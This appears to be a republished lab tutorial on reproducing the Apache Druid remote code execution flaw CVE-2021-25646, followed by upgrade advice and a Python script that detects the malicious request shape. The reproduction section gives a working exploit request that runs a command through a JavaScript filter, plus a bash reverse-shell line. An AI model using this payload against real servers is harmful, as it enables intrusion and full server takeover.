2025-01-23 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article explains how to reproduce the Apache Druid command execution vulnerability CVE-2021-25646. The editor considers it very practical and shares it here in the hope that you will gain something from reading it. Let's take a look.
0x00 Introduction
Druid is a distributed data processing system that supports real-time multi-dimensional OLAP analysis. It supports both high-speed real-time data ingestion and flexible, real-time multi-dimensional analysis and querying. Its most common use is therefore fast, flexible multi-dimensional OLAP analysis over big data. In addition, Druid has a key feature: it supports pre-aggregation at ingestion time and timestamp-based aggregate analysis, so it is often used for time-series data processing and analysis.
0x01 Vulnerability overview
In Apache Druid 0.20.0 and earlier, a user can send a malicious request that exploits this vulnerability to execute arbitrary code. An attacker can directly construct such a request to run arbitrary code and take control of the server.
0x02 Affected versions
Apache Druid < 0.20.1
0x03 Environment setup
1. This environment is built with Docker. Install Docker in the virtual machine, then pull the vulnerable environment with the following command:
docker pull fokkodriesprong/docker-druid
2. After the image has been downloaded, start the vulnerable environment with:
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
3. Once it is running, open http://your-ip:8888/ in a browser; seeing the Druid console indicates success.
0x04 Vulnerability reproduction
1. Open the Apache Druid home page in the browser and click Load data -> Local disk in the upper left.
2. In the form on the right, fill in Base directory: quickstart/tutorial/ and File filter: wikiticker-2015-09-12-sampled.json.gz. Click Preview when done, then click Next.
3. Open Burp and configure the browser proxy, then keep clicking Next until the step is Next: Filter, and capture the request.
4. Replace the data in the captured request body with the following JSON, change the dnslog address in the code to your own, send the request, and check whether the dnslog platform has received a lookup.
{
  "type": "index",
  "spec": {
    "type": "index",
    "ioConfig": {
      "type": "index",
      "firehose": {
        "type": "local",
        "baseDir": "quickstart/tutorial/",
        "filter": "wikiticker-2015-09-12-sampled.json.gz"
      }
    },
    "dataSchema": {
      "dataSource": "sample",
      "parser": {
        "type": "string",
        "parseSpec": {
          "format": "json",
          "timestampSpec": {"column": "time", "format": "iso"},
          "dimensionsSpec": {}
        }
      },
      "transformSpec": {
        "transforms": [],
        "filter": {
          "type": "javascript",
          "function": "function (value) {return java.lang.Runtime.getRuntime().exec('ping kujqmk.dnslog.cn -c 1')}",
          "dimension": "added",
          "": {"enabled": "true"}
        }
      }
    }
  },
  "samplerConfig": {"numRows": 500, "timeoutMs": 15000, "cacheKey": "4ddb48fdbad7406084e37a1b80100214"}
}
5. Replace the dnslog command in the function with a reverse shell payload, start a listener on the Kali machine, and the shell connects back successfully:
exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/172.16.1.132/8896 0>&1')
0x05 Remediation
1. Upgrade to the latest version of Apache Druid, available at
https://druid.apache.org/downloads.html
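Until the upgrade is rolled out, defenders can watch for the request shape used in the reproduction above. The following is an added detection example, not code from the original article or from the Druid project: it walks a parsed request body sent to the Druid sampler or task endpoints and reports every object declaring "type": "javascript", noting whether it also carries the "" : {"enabled": "true"} override seen in the payload. The two sample request bodies are constructed for this example, and the function text in the malicious one is a placeholder, not a command.

```python
import json

# Spec type whose objects carry user-supplied code in Druid requests
# (filters, extraction functions and similar specs use "type": "javascript").
JS_TYPE = "javascript"


def find_javascript_specs(node, path="$"):
    """Recursively walk a parsed Druid ingestion/sampler spec and return one
    finding per object declaring "type": "javascript".  Each finding records
    the JSON path, the embedded function text and whether the object also
    carries the "" : {"enabled": "true"} override used in the reproduction
    above to force JavaScript on for that request."""
    findings = []
    if isinstance(node, dict):
        if node.get("type") == JS_TYPE:
            override = node.get("")
            forced = (
                isinstance(override, dict)
                and str(override.get("enabled")).lower() == "true"
            )
            findings.append({
                "path": path,
                "function": node.get("function"),
                "forced_enable": forced,
            })
        for key, value in node.items():
            # An empty key is legal JSON; label it so the path stays readable.
            findings.extend(find_javascript_specs(value, f"{path}.{key or '<empty>'}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            findings.extend(find_javascript_specs(value, f"{path}[{i}]"))
    return findings


def scan_request_body(body):
    """Parse an HTTP request body (e.g. from a proxy or access log with bodies
    enabled) and return the JavaScript findings; non-JSON bodies yield none."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    return find_javascript_specs(doc)


# Constructed sample bodies for this example: a benign sampler request using
# an ordinary selector filter, and one carrying the JavaScript filter pattern
# from the reproduction above with the function text replaced by a placeholder.
BENIGN_BODY = json.dumps({
    "type": "index",
    "spec": {
        "type": "index",
        "dataSchema": {
            "dataSource": "sample",
            "transformSpec": {
                "transforms": [],
                "filter": {"type": "selector", "dimension": "added", "value": "1"},
            },
        },
    },
    "samplerConfig": {"numRows": 500},
})

MALICIOUS_BODY = json.dumps({
    "type": "index",
    "spec": {
        "type": "index",
        "dataSchema": {
            "dataSource": "sample",
            "transformSpec": {
                "transforms": [],
                "filter": {
                    "type": "javascript",
                    "dimension": "added",
                    "function": "function (value) { return PLACEHOLDER_NOT_A_COMMAND }",
                    "": {"enabled": "true"},
                },
            },
        },
    },
    "samplerConfig": {"numRows": 500},
})

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY)):
        hits = scan_request_body(body)
        print(f"{name}: {len(hits)} javascript spec(s)")
        for hit in hits:
            print("  ", hit)
```

Any "type": "javascript" object in a request from an unexpected client is worth an alert on its own, since the feature is meant for high-trust environments; the forced_enable flag singles out the specific override pattern used against unpatched 0.20.0 instances.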
The above is how to reproduce the Apache Druid command execution vulnerability CVE-2021-25646. The editor believes it contains knowledge points you may encounter or use in daily work, and hopes you can learn more from this article. For more details, please follow the industry information channel.